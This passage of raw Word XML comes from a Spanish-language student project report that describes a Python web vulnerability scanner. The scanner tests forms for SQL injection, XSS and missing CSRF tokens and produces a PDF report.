        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E64EE6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Diseño</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6DAF7C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3.1. Diseño de la arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F21165" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diagrama de despliegue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71923883" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118EFE37" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3392C3C6" wp14:editId="206D40D3">
            <wp:extent cx="5943600" cy="4339590"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="12409321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39590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1852FB09" w14:textId="4CF817D1" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B681F8" w14:textId="48A4E727" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794497C2" w14:textId="577EF073" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDB5919" w14:textId="68F5EE72" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC96780" w14:textId="72947C67" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457572A1" w14:textId="45BB6407" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42754C88" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2905C317" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2. Diseño de Lógica de Negocios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A2059" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00E04661" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04661">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diagrama de Secuencia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57CBC0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003C7CE7" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5C937B" wp14:editId="6C928B54">
            <wp:extent cx="5943600" cy="6909435"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="19035639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09435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="649EB1D3" w14:textId="21573544" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="00254721">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0223C4CB" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“Analizador de Vulnerabilidades en Python para estudiantes de primeros semestres de la FICCT”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141442A" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1. Planificación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE0BD61" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.1. Objetivo General</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCDEC9B" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Desarrollar un Analizador de Vulnerabilidades en Python para estudiantes de primeros semestres de la FICCT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FAE342" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="008C14B9" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C14B9">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.2. Objetivos Específicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED1281" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Analizar</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y comprender los posibles vectores de ataque web, enfocándose en formularios, parámetros de entrada y mecanismos de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB82D5" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diseñar</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> un sistema modular que permita realizar pruebas de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706E00D" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Implementar</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> funciones de detección de vulnerabilidades utilizando técnicas de escaneo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCE0ED1" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Realizar pruebas</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> exhaustivas del sistema de análisis, verificando la efectividad de la detección de vulnerabilidades en diferentes entornos de prueba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B3553" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1.3. Descripción del Proyecto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD9A359" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El presente proyecto consiste en el desarrollo de un </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sistema de análisis de vulnerabilidades web</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> orientado a la detección de amenazas comunes en aplicaciones basadas en formularios. El sistema realiza un </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>escaneo activo</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sobre los formularios disponibles en un sitio web objetivo, identificando posibles puntos débiles mediante técnicas de inyección de datos maliciosos y pruebas de omisión de mecanismos de seguridad como los tokens CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C39EA" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Durante el proceso de análisis, el sistema ejecuta pruebas automáticas para detectar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C26A2C6" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Inyección SQL (SQL Injection):</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> intentando insertar sentencias maliciosas en los campos de entrada para comprobar si es posible acceder o manipular bases de datos de manera indebida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413F3476" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> introduciendo scripts maliciosos en los formularios para evaluar si es posible comprometer la seguridad del navegador del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CC64FD" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Falta de protección CSRF:</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> inspeccionando si los formularios carecen de tokens de autenticación que prevengan ataques de falsificación de solicitudes entre sitios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4B1ABF" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Una vez completado el escaneo, los resultados obtenidos —incluyendo las vulnerabilidades detectadas y los parámetros comprometidos— se compilan y documentan de manera automática en un </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>reporte en formato PDF</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dicho informe facilita a los desarrolladores, analistas de seguridad o responsables de infraestructura una </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>revisión estructurada y accesible</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de los hallazgos, permitiendo así una rápida mitigación de las amenazas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584DED3F" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El sistema está implementado en </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Python 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, empleando librerías como </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BeautifulSoup</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>selenium</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>reportlab</w:t>
      </w:r>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
